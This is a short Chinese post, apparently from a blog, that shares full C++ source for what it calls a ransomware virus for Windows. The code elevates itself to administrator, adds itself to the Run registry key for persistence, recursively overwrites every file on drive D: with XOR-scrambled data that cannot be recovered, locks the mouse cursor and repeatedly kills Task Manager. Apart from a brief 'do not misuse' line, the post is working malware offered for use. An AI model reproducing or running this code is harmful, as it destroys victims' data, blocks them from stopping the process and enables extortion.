首先感谢粉丝的支持!
上代码!
#include#include #include #include #include #include using namespace std; void traverFile(char* pathName); void encryption(char* fileName); void *do_thread(void *arg); void test() { HKEY hKey; if(RegOpenKeyEx(HKEY_CURRENT_USER, _T("SOFTWARE\Microsoft\Windows\CurrentVersion\Run"), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) { TCHAR strExeFullDir[MAX_PATH]; GetModuleFileName(NULL, strExeFullDir, MAX_PATH); TCHAR strDir[MAX_PATH] = {}; DWORD nLength = MAX_PATH; long result = RegGetValue(hKey, nullptr, _T("勒索病毒"), RRF_RT_REG_SZ, 0, strDir, &nLength); if(result != ERROR_SUCCESS || _tcscmp(strExeFullDir, strDir) != 0) { RegSetValueEx(hKey, _T("GISRestart"), 0, REG_SZ, (LPBYTE)strExeFullDir, (lstrlen(strExeFullDir) + 1)*sizeof(TCHAR)); RegCloseKey(hKey); } } } void ManagerRun(LPCSTR exe, LPCSTR param, int nShow = SW_SHOW) { SHELLEXECUTEINFO ShExecInfo; ShExecInfo.cbSize = sizeof(SHELLEXECUTEINFO); ShExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS ; ShExecInfo.hwnd = NULL; ShExecInfo.lpVerb = "runas"; ShExecInfo.lpFile = exe; ShExecInfo.lpParameters = param; ShExecInfo.lpDirectory = NULL; ShExecInfo.nShow = nShow; ShExecInfo.hInstApp = NULL; BOOL ret = ShellExecuteEx(&ShExecInfo); CloseHandle(ShExecInfo.hProcess); } int main(int argc, char *argv[]) { if(argc == 1) { ShowWindow(GetConsoleWindow(), SW_HIDE); ManagerRun(argv[0], "2"); return 1; } else if(argc == 2) { string s; ifstream in("die.txt"); in >> s; if(int(s.find("false")) != -1) { cout << "检测到结束文件,已结束病毒!" << endl; system("pause"); return 0; } pthread_t tid; int ret; ret = pthread_create(&tid, NULL, do_thread, NULL); if(ret) { fprintf(stderr, "创建线程失败!n"); return -1; } ret = pthread_detach(tid); test(); srand((unsigned int)time(NULL)); traverFile("D:"); } return 0; } void encryption(char* fileName) { string s[100000]; ifstream in; in.open(fileName); int i = 1; while(in >> s[i]) { for(int j = 0; j < s[i].size(); j++) s[i][j] = (s[i][j] ^ rand()); i++; } ofstream out; out.open(fileName); while(i--) out << s[i] << (rand() % 2 ? " " : "n"); } void traverFile(char* pathName) { WIN32_FIND_DATA findData; char buff[MAX_PATH]; char temp[MAX_PATH]; sprintf(buff, "%s\\*.*", pathName); HANDLE hFile = FindFirstFile(buff, &findData); if(INVALID_HANDLE_VALUE == hFile) return; BOOL isContinue = true; while(isContinue) { memset(temp, 0, MAX_PATH); sprintf(temp, "%s\\%s", pathName, findData.cFileName); if(FILE_ATTRIBUTE_DIRECTORY == findData.dwFileAttributes) { if(strcmp(".", findData.cFileName) && strcmp("..", findData.cFileName)) { traverFile(temp); } } else encryption(temp); isContinue = FindNextFile(hFile, &findData); } } void *do_thread(void *arg) { while(true) { SetCursorPos(0, 0); system("taskkill /F /IM taskmgr.exe"); Sleep(10); } }
这个病毒新有提升到管理员权限,同时运行两串代码,边加密D盘,边定住鼠标,关闭任务管理器!
请勿滥用此代码!
好了,本期就到这里,感谢粉丝支持!
